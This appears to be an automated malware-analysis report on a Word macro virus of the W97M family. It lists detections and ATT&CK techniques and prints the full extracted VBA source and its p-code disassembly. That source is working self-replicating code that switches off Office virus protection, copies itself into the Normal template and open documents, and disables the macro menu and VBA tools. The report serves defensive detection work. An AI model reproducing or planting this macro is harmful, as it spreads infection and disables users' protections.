MALICIOUS
168
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample is identified as a W97M variant, a family known for macro-based attacks. The AutoOpen macro attempts to disable macro protection and copy itself to the Normal template, indicating a persistence mechanism. This behavior is consistent with malware designed to spread and execute malicious code within the Office environment.
Heuristics 5
-
ClamAV: Win.Trojan.W97M-13 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.W97M-13
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "AutoOpen" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11052 bytes |
SHA-256: 06aefc9e7b5dcc22a8fb067028e7e5cc7c8d04a341f41fee7a8c887735bbd075 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AutoOpen"
Option Explicit
Public Sub MAIN()
Dim MyFile$
Dim OkExist
Dim TemplateName$
Dim internal
Dim xItem
Dim t
Dim s
'ÉèÖôíÎóÏÝÚå
On Error Resume Next
'»ñÈ¡»î¶¯ÎļþÃû
If ActiveDocument.Path = "" Then
MyFile$ = ActiveDocument.Name
Else
MyFile$ = ActiveDocument.Path + "\" + ActiveDocument.Name
End If
If MyFile$ = "" Then GoTo Bye
'Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢
t = Format(Time, "hhmmss")
If Mid(t, 3, 2) = "00" And Not (Format(Date, "yyyy") = "1998" And Val(Format(Date, "mm")) < 9) Then
MsgBox s, vbSystemModal, "CPSDI"
'MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ"
End If
' ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê
OkExist = 0
For Each xItem In NormalTemplate.VBProject.VBComponents
If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
OkExist = 1
Exit For
End If
Next xItem
' »ñȡͨÓÃÄ£°åµÄÎļþÃû
TemplateName$ = NormalTemplate.Path + "\" + NormalTemplate.Name
'ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ
SetAttr TemplateName$, vbNormal
Options.VirusProtection = False
' ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å
If OkExist <> 1 Then
Application.OrganizerCopy Source:=MyFile$, Destination:=TemplateName$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If
' ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê
OkExist = 0
For Each xItem In ActiveDocument.VBProject.VBComponents
If xItem.Type = 1 And xItem.Name = "AutoOpen" Then
OkExist = 1
Exit For
End If
Next xItem
'¿½±´AutoOpenºêµ½»î¶¯Îĵµ
If OkExist <> 1 Then
Application.OrganizerCopy Source:=TemplateName$, Destination:=MyFile$, Name:="AutoOpen", Object:=wdOrganizerObjectProjectItems
End If
Bye:
' ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷
internal = "00:" + Str(10 - Val(Mid(t, 4, 1)))
Application.OnTime When:=Now + TimeValue(internal) - TimeValue("00:00:" + Right(t, 2)), Name:="AutoOpen", Tolerance:=60
DisableMacroMenu
DisableVBTools
End Sub
Public Sub DisableMacroMenu()
'ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ
Dim cb, xItem, xxItem, xxxItem
For Each cb In ActiveDocument.CommandBars
If cb.Name = "Menu Bar" Then
For Each xItem In cb.Controls
If xItem.Caption = "¹¤¾ß(&T)" Then
For Each xxItem In xItem.Controls
If xxItem.Caption = "ºê(&M)" Then
'xxItem.Enabled = True
For Each xxxItem In xxItem.Controls
xxxItem.Enabled = False
Next xxxItem
Exit Sub
End If
Next xxItem
End If
Next xItem
End If
Next cb
End Sub
Public Sub DisableVBTools()
'ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ
Dim cb
For Each cb In ActiveDocument.CommandBars
If cb.Name = "Visual Basic" Then
cb.Enabled = False
Exit For
End If
Next cb
End Sub
' Processing file: /opt/analyzer/scan_staging/20de1762c7234ee2bc1897fc42b88c8a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/AutoOpen - 5792 bytes
' Line #0:
' Option (Explicit)
' Line #1:
' Line #2:
' FuncDefn (Public Sub MAIN())
' Line #3:
' Line #4:
' Dim
' VarDefn MyFile
' Line #5:
' Dim
' VarDefn OkExist
' Line #6:
' Dim
' VarDefn TemplateName
' Line #7:
' Dim
' VarDefn internal
' Line #8:
' Dim
' VarDefn xItem
' Line #9:
' Dim
' VarDefn t
' Line #10:
' Dim
' VarDefn s
' Line #11:
' Line #12:
' QuoteRem 0x0000 0x000C "ÉèÖôíÎóÏÝÚå"
' Line #13:
' OnError (Resume Next)
' Line #14:
' Line #15:
' QuoteRem 0x0000 0x000E "»ñÈ¡»î¶¯ÎļþÃû"
' Line #16:
' Ld ActiveDocument
' MemLd Path
' LitStr 0x0000 ""
' Eq
' IfBlock
' Line #17:
' Ld ActiveDocument
' MemLd New
' St MyFile$
' Line #18:
' ElseBlock
' Line #19:
' Ld ActiveDocument
' MemLd Path
' LitStr 0x0001 "\"
' Add
' Ld ActiveDocument
' MemLd New
' Add
' St MyFile$
' Line #20:
' EndIfBlock
' Line #21:
' Line #22:
' Ld MyFile$
' LitStr 0x0000 ""
' Eq
' If
' BoSImplicit
' GoTo Bye
' EndIf
' Line #23:
' Line #24:
' QuoteRem 0x0000 0x0014 "Õûµã³öÏÖÈÕÆÚʱ¼äÐÅÏ¢"
' Line #25:
' Ld Time
' LitStr 0x0006 "hhmmss"
' ArgsLd Format$ 0x0002
' St t
' Line #26:
' Ld t
' LitDI2 0x0003
' LitDI2 0x0002
' ArgsLd Mid$ 0x0003
' LitStr 0x0002 "00"
' Eq
' Ld Date
' LitStr 0x0004 "yyyy"
' ArgsLd Format$ 0x0002
' LitStr 0x0004 "1998"
' Eq
' Ld Date
' LitStr 0x0002 "mm"
' ArgsLd Format$ 0x0002
' ArgsLd Val 0x0001
' LitDI2 0x0009
' Lt
' And
' Paren
' Not
' And
' IfBlock
' Line #27:
' Ld s
' Ld vbSystemModal
' LitStr 0x0005 "CPSDI"
' ArgsCall MsgBox 0x0003
' Line #28:
' QuoteRem 0x0002 0x0066 "MsgBox Format(Date, "dddd,yyyy mmm dd") + "ÈÕ " + Format(Time, "hh") + "ʱ", vbSystemModal, "ÎÒµÄÌáÐÑ""
' Line #29:
' EndIfBlock
' Line #30:
' Line #31:
' Line #32:
' QuoteRem 0x0000 0x0021 " ÔÚͨÓÃÄ£°åÖвéÕÒÊÇ·ñÓÐAutoOpenºê"
' Line #33:
' LitDI2 0x0000
' St OkExist
' Line #34:
' StartForVariable
' Ld xItem
' EndForVariable
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #35:
' Ld xItem
' MemLd TypeOf
' LitDI2 0x0001
' Eq
' Ld xItem
' MemLd New
' LitStr 0x0008 "AutoOpen"
' Eq
' And
' IfBlock
' Line #36:
' LitDI2 0x0001
' St OkExist
' Line #37:
' ExitFor
' Line #38:
' EndIfBlock
' Line #39:
' StartForVariable
' Ld xItem
' EndForVariable
' NextVar
' Line #40:
' Line #41:
' QuoteRem 0x0000 0x0015 " »ñȡͨÓÃÄ£°åµÄÎļþÃû"
' Line #42:
' Ld NormalTemplate
' MemLd Path
' LitStr 0x0001 "\"
' Add
' Ld NormalTemplate
' MemLd New
' Add
' St TemplateName$
' Line #43:
' Line #44:
' QuoteRem 0x0000 0x0030 "ÉèÖÃͨÓÃÄ£°åµÄÎļþÊôÐÔΪµµ°¸²¢½â³ýÆä²¡¶¾·À»¤¹¦ÄÜ"
' Line #45:
' Ld TemplateName$
' Ld vbNormal
' ArgsCall SetAttr 0x0002
' Line #46:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #47:
' Line #48:
' QuoteRem 0x0000 0x0019 " ¿½±´AutoOpenºêµ½Í¨ÓÃÄ£°å"
' Line #49:
' Ld OkExist
' LitDI2 0x0001
' Ne
' IfBlock
' Line #50:
' Ld MyFile$
' ParamNamed Source
' Ld TemplateName$
' ParamNamed Destination
' LitStr 0x0008 "AutoOpen"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #51:
' EndIfBlock
' Line #52:
' Line #53:
' QuoteRem 0x0000 0x0021 " ÔڻÎĵµÖвéÕÒÊÇ·ñÓÐAutoOpenºê"
' Line #54:
' LitDI2 0x0000
' St OkExist
' Line #55:
' StartForVariable
' Ld xItem
' EndForVariable
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ForEach
' Line #56:
' Ld xItem
' MemLd TypeOf
' LitDI2 0x0001
' Eq
' Ld xItem
' MemLd New
' LitStr 0x0008 "AutoOpen"
' Eq
' And
' IfBlock
' Line #57:
' LitDI2 0x0001
' St OkExist
' Line #58:
' ExitFor
' Line #59:
' EndIfBlock
' Line #60:
' StartForVariable
' Ld xItem
' EndForVariable
' NextVar
' Line #61:
' Line #62:
' QuoteRem 0x0000 0x0018 "¿½±´AutoOpenºêµ½»î¶¯Îĵµ"
' Line #63:
' Ld OkExist
' LitDI2 0x0001
' Ne
' IfBlock
' Line #64:
' Ld TemplateName$
' ParamNamed Source
' Ld MyFile$
' ParamNamed Destination
' LitStr 0x0008 "AutoOpen"
' ParamNamed New
' Ld wdOrganizerObjectProjectItems
' ParamNamed On
' Ld Application
' ArgsMemCall OrganizerCopy 0x0004
' Line #65:
' EndIfBlock
' Line #66:
' Line #67:
' Label Bye
' Line #68:
' Line #69:
' QuoteRem 0x0000 0x001F " ÉèÖÃ×Ô¶¯ÔËÐÐAutoOpenºêµÄ¼ÆÊ±Æ÷"
' Line #70:
' LitStr 0x0003 "00:"
' LitDI2 0x000A
' Ld t
' LitDI2 0x0004
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Val 0x0001
' Sub
' ArgsLd Str 0x0001
' Add
' St internal
' Line #71:
' Ld Now
' Ld internal
' ArgsLd TimeValue 0x0001
' Add
' LitStr 0x0006 "00:00:"
' Ld t
' LitDI2 0x0002
' ArgsLd Right 0x0002
' Add
' ArgsLd TimeValue 0x0001
' Sub
' ParamNamed When
' LitStr 0x0008 "AutoOpen"
' ParamNamed New
' LitDI2 0x003C
' ParamNamed Tolerance
' Ld Application
' ArgsMemCall OnTime 0x0003
' Line #72:
' ArgsCall DisableMacroMenu 0x0000
' Line #73:
' ArgsCall DisableVBTools 0x0000
' Line #74:
' EndSub
' Line #75:
' FuncDefn (Public Sub DisableMacroMenu())
' Line #76:
' QuoteRem 0x0000 0x001E "ʹ¹¤¾ß²Ëµ¥ÖеĺêÃüÁî×éʧȥ×÷ÓÃ"
' Line #77:
' Dim
' VarDefn cb
' VarDefn xItem
' VarDefn xxItem
' VarDefn xxxItem
' Line #78:
' StartForVariable
' Ld cb
' EndForVariable
' Ld ActiveDocument
' MemLd CommandBars
' ForEach
' Line #79:
' Ld cb
' MemLd New
' LitStr 0x0008 "Menu Bar"
' Eq
' IfBlock
' Line #80:
' StartForVariable
' Ld xItem
' EndForVariable
' Ld cb
' MemLd Controls
' ForEach
' Line #81:
' Ld xItem
' MemLd Caption
' LitStr 0x0008 "¹¤¾ß(&T)"
' Eq
' IfBlock
' Line #82:
' StartForVariable
' Ld xxItem
' EndForVariable
' Ld xItem
' MemLd Controls
' ForEach
' Line #83:
' Ld xxItem
' MemLd Caption
' LitStr 0x0006 "ºê(&M)"
' Eq
' IfBlock
' Line #84:
' QuoteRem 0x000C 0x0015 "xxItem.Enabled = True"
' Line #85:
' StartForVariable
' Ld xxxItem
' EndForVariable
' Ld xxItem
' MemLd Controls
' ForEach
' Line #86:
' LitVarSpecial (False)
' Ld xxxItem
' MemSt Enabled
' Line #87:
' StartForVariable
' Ld xxxItem
' EndForVariable
' NextVar
' Line #88:
' ExitSub
' Line #89:
' EndIfBlock
' Line #90:
' StartForVariable
' Ld xxItem
' EndForVariable
' NextVar
' Line #91:
' EndIfBlock
' Line #92:
' StartForVariable
' Ld xItem
' EndForVariable
' NextVar
' Line #93:
' EndIfBlock
' Line #94:
' StartForVariable
' Ld cb
' EndForVariable
' NextVar
' Line #95:
' EndSub
' Line #96:
' FuncDefn (Public Sub DisableVBTools())
' Line #97:
' QuoteRem 0x0000 0x0020 "ʹ¹¤¾ßÀ¸ÖеÄVisual Basicʧȥ×÷ÓÃ"
' Line #98:
' Dim
' VarDefn cb
' Line #99:
' StartForVariable
' Ld cb
' EndForVariable
' Ld ActiveDocument
' MemLd CommandBars
' ForEach
' Line #100:
' Ld cb
' MemLd New
' LitStr 0x000C "Visual Basic"
' Eq
' IfBlock
' Line #101:
' LitVarSpecial (False)
' Ld cb
' MemSt Enabled
' Line #102:
' ExitFor
' Line #103:
' EndIfBlock
' Line #104:
' StartForVariable
' Ld cb
' EndForVariable
' NextVar
' Line #105:
' EndSub
' Line #106:
' Line #107:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.